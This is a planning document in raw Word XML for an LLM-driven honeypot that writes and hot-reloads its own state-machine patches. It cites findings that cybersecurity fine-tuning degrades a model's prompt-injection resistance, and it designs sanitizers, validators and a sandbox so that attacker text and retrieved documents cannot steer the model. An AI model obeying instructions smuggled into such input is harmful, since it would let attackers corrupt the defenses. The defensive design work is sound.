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Adaptive Honeypot Orchestrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">An LLM-Driven System for Detecting Novel Attacks and Self-Extending a State-Machine Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Planning Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 0.4 — Pre-Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F7F7F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">June 2, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="18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Project Goal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a system that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">runs a Cowrie SSH/Telnet honeypot whose behavior is driven by an explicit state machine, detects novel (potentially zero-day) attack patterns in real time when an attacker issues a command the state machine cannot handle, uses an LLM-driven cybersecurity expert to write the code that extends the state machine to respond to that command, and hot-reloads the honeypot in place </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tuned to deepen engagement with that specific attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why this matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Static honeypots are fingerprinted quickly. Default Cowrie identity (svr04, OpenSSH 7.9p1) is in every attacker's blocklist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">99.2% of honeypot traffic is opportunistic scanning. The remaining 0.8% — sophisticated or novel — is where intelligence value lives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A self-extending state machine gives a moving target: each unhandled command teaches the honeypot a new, plausible response, growing its surface area over time to keep attackers engaged longer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Success criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detect a novel attack within a single session (sub-minute reaction time).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate, validate, and hot-reload a state-machine patch for the unhandled command within 60–120 seconds of detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Measurable increase in attacker session length on the extended state machine vs. baseline (baseline ~3 commands, current SOTA LLM honeypots reach ~6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capture a useful artifact (downloaded payload, exfil attempt, novel command sequence) the baseline would have missed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Critical Issue with the Baseline Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original plan: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">fine-tune Gemma 4 on CyberLLMInstruct, add RAG.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> There is one finding from the dataset's own paper that we must address up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4"/>
            </w:tcBorders>
            <w:shd w:fill="FFE5E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ CyberLLMInstruct destroys safety alignment in every model tested</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">From the dataset paper (arxiv 2503.09334): fine-tuning Llama 3.1 8B on CyberLLMInstruct dropped its </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">prompt-injection resilience score from 0.95 to 0.15.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Every model tested — Phi 3, Mistral, Qwen 2.5, Llama 3/3.1, Gemma 2, Llama 2 70B — exhibited severe safety degradation across the OWASP LLM Top 10 categories.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Implication for us: </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">because the main cybersecurity LLM both reads raw attacker sessions and writes patches, the prompt-injection defense cannot live in the model's own alignment — that alignment is exactly what fine-tuning degrades. It must be structural: a dedicated security agent that sanitizes and wraps attacker input before the orchestrator reasons over it, plus validator agents and a sandbox that gate every generated patch. The model is never trusted to police itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cybersecurity LLM accuracy gains are real, but constrained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fine-tuned models reach up to 92.50% on CyberMetric (vs. ~70% for the base). That's the upside. The downside above is what shapes our architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. System Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 The pipeline (left to right)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">End-to-end data flow from packet to a hot-reloaded state-machine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Stage</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Responsibility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State-machine Cowrie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Listens on tcp:2222. Each command is matched against an explicit state machine. A handled command returns its coded response; an unhandled command raises a state-machine miss (the novelty signal) and emits cowrie.json events including the miss marker.</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Filter / Router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Deterministic prefilter. Only sessions that produced a state-machine miss are candidates for the LLM path. Hashes those command sequences against a known-scanner signature table (Mirai variants, common credential-stuffing scripts) and caches misses already patched, dropping 99% of traffic before any LLM call.</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Security agent (intake)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The state-machine miss is the novelty signal — there is no separate detector. This agent is the trust boundary: it normalizes the missed session into structured fields, strips/escapes control sequences, and wraps the raw attacker text in clearly delimited, non-instruction context before any LLM reasons over it. It is the structural prompt-injection defense the orchestrator cannot provide for itself. Full design in Section 4.</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Research agent (RAG)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A tool-using agent the orchestrator delegates to. Runs hybrid graph + vector retrieval over the knowledge base, pulling matching CVEs, MITRE ATT&amp;CK techniques, and historical attack sessions that resemble this one, and returns a distilled brief rather than raw documents.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Orchestrator + scripter (main LLM)</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The one fine-tuned cybersecurity LLM, acting in two roles. As orchestrator it plans: decides whether the miss warrants a patch, calls the research agent, and sequences the work. As scripter it writes the state-machine patch from (sanitized session + unhandled command + research brief): the handler code and any supporting fake-filesystem or credential fixtures the new transition needs, emitted as a structured, schema-checked diff. INTERNAL ONLY — never on the attacker-facing path.</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Validator agents + control plane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Validator agents gate every generated patch — schema check, static analysis (no shell escapes, no network calls), and a sandbox replay against the original session. None of them trust the model's output. A thin deterministic control plane (plain Python) then version-controls the approved patch and hot-reloads the state machine in place. Rolls back on any failure.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Updated state machine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Same honeypot on tcp:2222, now able to handle the previously unknown command. Logs feed back into Stage 1; the once-novel command is now a state-machine hit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Why an agentic system, not one monolithic prompt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Separation of concerns. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">We have one LLM, but we do not hand it one mega-prompt that reads attacker input, researches, writes code, and self-checks in a single pass. We decompose the work into agents — the LLM as orchestrator, the same model as scripter, a tool-using research agent — fronted by a non-LLM security agent at the trust boundary and followed by validator agents that gate the output. Each agent has a narrow contract and least privilege, so a confused or subverted step is contained instead of contaminating the whole patch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Safety. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fine-tuning the model on cybersecurity data degrades its own prompt-injection resistance (Section 2), so the model cannot be trusted to police itself. Defense is therefore structural, not behavioral: the security agent sanitizes and wraps attacker text before the orchestrator reads it, and validator agents plus a sandbox gate every patch before reload. The main LLM only ever emits a state-machine patch — it never executes attacker input and is never on the attacker-facing path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cost and latency. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The deterministic Stage 2 prefilter — not an LLM — drops ~99% of traffic, so the expensive agentic path runs on roughly 1% of sessions. This is what keeps the design affordable: the SoK survey on LLM honeypots specifically warns about "denial-of-wallet" attacks where scanners exhaust the LLM budget. The slow agentic loop is only entered when a genuine state-machine miss survives the prefilter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Agentic Patch Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is no separate detector. The state-machine miss (Stage 1) is the entire novelty signal; everything downstream is the agentic system that turns a miss into a validated, hot-reloaded patch. This section specifies the agents, their trust boundaries, and the control flow between them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 The agents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One fine-tuned cybersecurity LLM does the reasoning and the code-writing. It is surrounded by smaller, single-purpose agents that constrain it. Each row below is a distinct contract; no agent trusts the one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Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Responsibility</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Security agent</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Untrusted input boundary</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Non-LLM (rules + a small classifier). First to touch the missed session. Normalizes it into structured fields, strips and escapes control sequences and shell metacharacters, and wraps the raw attacker text in clearly delimited, non-instruction context. Nothing reaches the LLM unsanitized.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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Orchestrator (main LLM)</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Trusted planner</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Decides whether the miss warrants a patch, what context is needed, and in what order to act. Delegates retrieval to the research agent and code-writing to the scripter. Holds the plan; never executes anything itself.</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Research agent (RAG)</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Tool, read-only</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Hybrid graph + vector retrieval over the knowledge base (CVEs, MITRE ATT&amp;CK techniques, historical sessions, STINGAR indicators). Returns a distilled brief, not raw documents, so retrieved text cannot smuggle instructions back to the orchestrator.</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Scripter (main LLM)</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Trusted author, sandboxed output</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The same model in its code-writing role. Given the sanitized session + unhandled command + research brief, emits a state-machine patch — handler code plus any fake-filesystem or credential fixtures the new transition needs — as a structured, schema-constrained diff. Output is data, never executed in place.</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Validator agents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Adversarial reviewers</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Independently gate every patch: schema validation, static analysis (no shell escapes, no outbound network, no filesystem writes outside the fake FS), and a sandbox replay against the original session. Any single failure rejects the patch. They assume the patch is hostile.</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rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Control plane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Deterministic, non-LLM</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Plain Python. Version-controls the approved patch, hot-reloads the state machine in place on tcp:2222, and rolls back automatically if the reload or post-reload smoke test fails.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Control flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">End to end, a single missed command moves through the agents as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Miss. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Stage 1 raises a state-machine miss; Stage 2's deterministic prefilter confirms it is not a known scanner or an already-patched command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitize. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The security agent normalizes and wraps the session. From here on, attacker text is quoted data, never instructions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Triage. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The orchestrator decides whether this miss is worth a patch (see Section 4.3). If not, it is logged and dropped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Research. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The orchestrator calls the research agent, which returns a distilled brief of relevant CVEs, techniques, and prior sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Script. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The scripter writes the patch as a schema-constrained diff.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validate. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Validator agents run schema, static-analysis, and sandbox-replay checks. A failure sends the patch back to the orchestrator with the reason, or rejects it outright once a retry budget is exhausted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Apply. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The control plane version-controls and hot-reloads the patch; a post-reload smoke test confirms the once-novel command is now a state-machine hit. On any error it rolls back.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 When to patch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The expensive agentic loop runs only when the orchestrator judges the miss worth a handler. Its criteria:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The command sequence is not pure reconnaissance — recon alone rarely justifies a new handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No equivalent handler already exists or is queued for the same command (avoid duplicate patches).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A convincing handler would plausibly advance the engagement — drawing the attacker further and yielding more intelligence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Everything else is logged as novelty telemetry without invoking the scripter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 The hard truth about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4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="160"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Set expectations before building</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">True zero-days are vanishingly rare. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">You will much more often detect “Mirai variant we haven’t seen yet” than “novel kernel exploit.” That is still high-value intelligence, but don’t frame the project as zero-day-only.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Novelty detection has irreducible false positives. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">A weird-looking miss might come from a researcher, a misconfigured scanner, or a typo. Plan for ~10% of patches being for non-attack commands early on.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">The corpus is everything. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Day 1, everything looks novel because you’ve seen nothing. The first ~4 weeks should be corpus-building with the scripter offline (Phase 1 in the roadmap).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-stage attacks span sessions. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">A sophisticated attacker reconnoiters in session 1 (looks like a scanner) and exploits in session 5 (looks unremarkable on its own). Session-level triage misses this. You need source-IP and behavioral correlation on top.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Cowrie has structural tells no patch can fix. </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Real </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wget</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> doesn’t work, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">vim</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">top</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> break, timing latency is wrong. A state-machine miss telling you a session is “novel” doesn’t mean the attacker was fooled — just that they did something different before leaving.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Base Model Selection (the main LLM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Reconsidering Gemma 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gemma 4 (released April 2026) is excellent. But on the specific metric we care about — performance after small-model fine-tuning — recent benchmarks rank the Qwen3 family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Model</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Fine-tune rank</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Notes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Qwen3-4B-Instruct-2507</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#1 (distil labs benchmark)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Best raw fine-tuning gains. Strong reasoning. Dual-mode (thinking/non-thinking).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Qwen3-8B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Recommended for the main LLM. Sweet spot of capability/cost.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Llama 3.2-1B / 3B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#3 / #5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Biggest *relative* gains from fine-tuning. Largest community ecosystem.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Gemma 4 E4B (4.5B)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Trails Qwen3 / Llama on FT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Best on-device option (5GB RAM @ 4-bit). Apache 2.0. Multimodal.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Llama 3.1 8B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 AVOID for this use case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Showed the worst safety degradation in CyberLLMInstruct paper (0.95→0.15).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Main LLM (fine-tuned): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Qwen3-8B with QLoRA. This one model serves both the orchestrator and scripter roles. Switch to Gemma 4 E4B if you need on-device deployment without a GPU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Everything around it is not an LLM. </w:t>
      </w:r>
      <w:r>
